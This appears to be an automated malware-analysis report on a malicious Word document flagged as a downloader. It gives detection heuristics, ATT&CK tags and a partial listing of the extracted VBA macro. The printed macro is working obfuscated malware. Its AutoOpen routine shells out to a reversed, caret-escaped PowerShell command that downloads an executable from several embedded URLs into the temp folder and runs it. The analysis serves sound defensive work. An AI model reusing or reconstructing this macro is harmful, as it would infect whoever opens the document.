MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The ClamAV detection name 'Doc.Downloader.Nastjencro' further suggests a downloader functionality. The macro's obfuscated string concatenation makes it difficult to determine the exact payload, but the intent is clearly to download and execute a secondary stage.
Heuristics 6
-
ClamAV: Doc.Downloader.Nastjencro-6681864-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Nastjencro-6681864-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4695 bytes |
SHA-256: 964e89c7ff14329216c1b323efa18696459f61a700e4813c112b0ae0775882c0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jONUMNtbK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Set wIXRDU = IvEjwj
Set UYpPj = ZUkPq
Set wSzfJz = ijQUcT
Set ORIVO = nOobNk
Shell THlEd + OlwzlCzwn + UmVrfDp + bHALjjIGRWp + hsifiowqwDkzkk, Format(0)
Set OnKzkC = qwojM
Set EQLvwA = iIJiCY
Set INZlzh = aBAik
Set mNfRr = IpXRO
End Sub
Attribute VB_Name = "ZwFEdDZMWQKFj"
Function THlEd()
On _
Error _
Resume _
Next
Set icjXj = lrLSvw
Set zAirG = jrCzIG
AuBSU = Format(Chr(4 + 10 + 15 + 17 + 53)) + "md /" + "V^:^ON/" + Format(Chr(3 + 7 + 10 + 11 + 36)) + Format(Chr(1 + 3 + 4 + 5 + 21)) + "^s^e^" + "t " + Format(Chr(4 + 10 + 15 + 17 + 53))
Set UAihFC = nNJEA
Set NOrns = JPZspl
Set hOdpcG = SRPSSX
JFYSszTdOTl = "^P0=" + "^ ^" + " " + " " + "^"
Set BfBcol = SQWbF
Set sUQzFw = PXbXvw
Set ZOwwq = JjJlvz
tnzCijMp = " ^ ^ " + " ^ ^ " + " " + "^ ^" + "}}{^h" + Format(Chr(4 + 10 + 15 + 17 + 53)) + "t" + "a" + Format(Chr(4 + 10 + 15 + 17 + 53)) + "^};"
Set ilqfX = BXHSDm
RaEzzwkHY = "k^aer^" + "b;V^U" + "N^" + "$^ m^" + "e^" + "t^" + "I-^ek^" + "ovn^" + "I;"
Set topwr = fHlvi
Set OKBUr = wmERE
Set qpfnD = JErHH
iaJRbPI = ")VUN" + "^$" + "^ ,^S" + "^a^z$(" + "^eliF"
Set ziFkoO = JwRivr
Set oXkdT = qbwrh
Set WDtIK = zHzjQ
aBNVSVY = "da" + "^oln^" + "wo^D." + "bt^i${" + "^yrt{)" + "^Xq^" + "a$ ni^ " + "^Sa"
Set sNEIJf = DjXjNj
hmbXOiQVB = "^" + "z^$(" + "^h" + Format(Chr(4 + 10 + 15 + 17 + 53)) + "^" + "a" + "e" + "r^of;^'" + "e^xe" + "^.^'^+^" + "Y^tr^$" + "+^'\'^"
Set lzZNs = NXwKo
Set tGnsm = YalYjL
Set TVqjwN = iYuRTT
Set wmoEr = KTjuwp
zUObVSka = "+" + Format(Chr(4 + 10 + 15 + 17 + 53)) + "^i^" + "l" + "b^up:" + "vn" + "^e$"
Set sbTaCB = lsHzEJ
vAClcjOiq = "=V" + "^UN$;'" + "^44" + "4'" + " = ^" + "Y^tr^$^" + ";)'@'"
THlEd = AuBSU + JFYSszTdOTl + tnzCijMp + RaEzzwkHY + iaJRbPI + aBNVSVY + hmbXOiQVB + zUObVSka + vAClcjOiq
Set zkoPu = rTcjb
Set bkncm = aplXBI
Set zYPKmv = FaSMZq
Set ibcaI = YnciAG
Set ouKQH = QzAuz
End Function
Function OlwzlCzwn()
On _
Error _
Resume _
Next
Set jbhdZN = DnSFs
Set MOiStj = KYIIJX
CtGqA = "(t" + "i^l^p^" + "S.'" + "^k0" + "/^ur^." + "^" + "4" + "^2" + "f" + "^k^m" + "//:^pt" + "t^h@"
Set jzLPbM = inDUR
Set HMtsnB = wZBCjz
Set wztZJS = pkSVCZ
Set pLqAL = ziIKPj
OKBfXMsopmV = "^e^a6" + Format(Chr(4 + 10 + 15 + 17 + 53)) + "l^sG/" + "t" + "^e" + "n^" + ".^gni^w"
Set RwZdJM = qwznzR
Set tiwzE = KnwIG
iSbjPncdE = "^o^m^or" + "^t^" + "em//^" + ":p^t" + "^" + "t^h^@^" + "0" + "^"
Set juXpHr = qGkfp
Set RnPrt = KlUYE
ArVpOcsozau = "sDV" + "/^ur" + "^.ha^kn" + "^i^t" + "rak" + "vr^i" + "m//" + ":^p" + "t^" + "th^@rx" + "Rh^M8" + "^w" + Format(Chr(3 + 7 + 10 + 11 + 36)) + "/^"
Set aUCBT = SDQHJ
Set DcMSP = wVLtO
Set duawlz = APlhiV
EJwfVwIRLo = "m^" + "o" + Format(Chr(4 + 10 + 15 + 17 + 53)) + "^." + "e^k^au" + "m//:p" + "t^t^h@" + "^p" + "XV" + "^"
Set WIizU = IHGpz
JQkGHwXLBT = "H^t^T" + "/m^o" + Format(Chr(4 + 10 + 15 + 17 + 53)) + "." + "ai^m^" + "e" + "da" + Format(Chr(4 + 10 + 15 + 17 + 53)) + "afo"
Set bnjUZ = dRVKJ
YDlIXHUYjTf = "s^t^h" + "^" + "g^ink/" + "/:^ptt" + "^h^'=" + "X^q" + "^a^$;^" + "tne^il" + Format(Chr(3 + 7 + 10 + 11 + 36)) + "^b^" + "e^" + "W^.^" + "te" + "N t"
Set QpDmK = ZJjsm
Set fntCEH = ljSiWl
Set wAcKAJ = vBhVlE
Set qRTRc = vzDia
rijhazliX = Format(Chr(4 + 10 + 15 + 17 + 53)) + "ej" + "^bo^" + "-^w" + "en^=" + "bti^" + "$ l^l^" + "e^hs" + "rew^"
OlwzlCzwn = CtGqA + OKBfXMsopmV + iSbjPncdE + ArVpOcsozau + EJwfVwIRLo + JQkGHwXLBT + YDlIXHUYjTf + rijhazliX
Set sVjVkw = cNCTq
Set DYcZT = iLdibi
End Function
Function UmVrfDp()
On _
Error _
Resume _
Next
Set Zhjra = cUMqr
Set cBSUAY = IPMNw
EjCQHwSa = "o^p&&^f" + "^or /^" + "L %^A ^" + "i
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.